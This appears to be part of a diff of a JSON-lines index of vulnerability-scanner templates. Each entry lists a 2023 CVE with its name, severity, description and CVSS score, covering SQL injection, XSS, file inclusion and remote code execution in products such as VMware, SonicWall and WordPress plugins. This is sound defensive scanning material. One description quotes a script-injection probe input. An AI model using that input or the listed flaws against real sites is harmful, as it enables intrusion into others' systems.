{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
{"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"} {"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"}
{"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"} {"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"}
{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"}
{"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"} {"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"}
{"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"}
{"ID":"CVE-2023-0563","Info":{"Name":"Bank Locker Management System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-0563.yaml"}
{"ID":"CVE-2023-0630","Info":{"Name":"Slimstat Analytics \u003c 4.9.3.3 Subscriber - SQL Injection","Severity":"high","Description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0630.yaml"} {"ID":"CVE-2023-0630","Info":{"Name":"Slimstat Analytics \u003c 4.9.3.3 Subscriber - SQL Injection","Severity":"high","Description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0630.yaml"}
{"ID":"CVE-2023-0669","Info":{"Name":"Fortra GoAnywhere MFT - Remote Code Execution","Severity":"high","Description":"Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0669.yaml"} {"ID":"CVE-2023-0669","Info":{"Name":"Fortra GoAnywhere MFT - Remote Code Execution","Severity":"high","Description":"Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0669.yaml"}
{"ID":"CVE-2023-0942","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0942.yaml"} {"ID":"CVE-2023-0942","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0942.yaml"}
@ -1789,9 +1797,13 @@
{"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"} {"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"}
{"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"} {"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"}
{"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"} {"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"}
{"ID":"CVE-2023-1454","Info":{"Name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1454.yaml"}
{"ID":"CVE-2023-1496","Info":{"Name":"Imgproxy \u003c 3.14.0 - Cross-site Scripting (XSS)","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1496.yaml"}
{"ID":"CVE-2023-1671","Info":{"Name":"Sophos Web Appliance - Remote Code Execution","Severity":"critical","Description":"A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1671.yaml"} {"ID":"CVE-2023-1671","Info":{"Name":"Sophos Web Appliance - Remote Code Execution","Severity":"critical","Description":"A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1671.yaml"}
{"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"}
{"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"} {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"}
{"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"}
{"ID":"CVE-2023-20889","Info":{"Name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","Severity":"high","Description":"Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20889.yaml"}
{"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"}
{"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"}
{"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} {"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"}
@ -1807,26 +1819,32 @@
{"ID":"CVE-2023-24278","Info":{"Name":"Squidex \u003c7.4.0 - Cross-Site Scripting","Severity":"medium","Description":"Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24278.yaml"} {"ID":"CVE-2023-24278","Info":{"Name":"Squidex \u003c7.4.0 - Cross-Site Scripting","Severity":"medium","Description":"Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24278.yaml"}
{"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","Severity":"medium","Description":"mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24322.yaml"} {"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","Severity":"medium","Description":"mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24322.yaml"}
{"ID":"CVE-2023-24367","Info":{"Name":"Temenos T24 R20 - Cross-Site Scripting","Severity":"medium","Description":"Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24367.yaml"} {"ID":"CVE-2023-24367","Info":{"Name":"Temenos T24 R20 - Cross-Site Scripting","Severity":"medium","Description":"Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24367.yaml"}
{"ID":"CVE-2023-24488","Info":{"Name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","Severity":"medium","Description":"Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24488.yaml"}
{"ID":"CVE-2023-24657","Info":{"Name":"phpIPAM - 1.6 - Cross-Site Scripting","Severity":"medium","Description":"phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24657.yaml"} {"ID":"CVE-2023-24657","Info":{"Name":"phpIPAM - 1.6 - Cross-Site Scripting","Severity":"medium","Description":"phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24657.yaml"}
{"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"} {"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"}
{"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"} {"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"}
{"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"} {"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"}
{"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"} {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"}
{"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"} {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
{"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"} {"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"}
{"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"} {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"}
{"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"} {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"}
{"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"critical","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"} {"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"critical","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"}
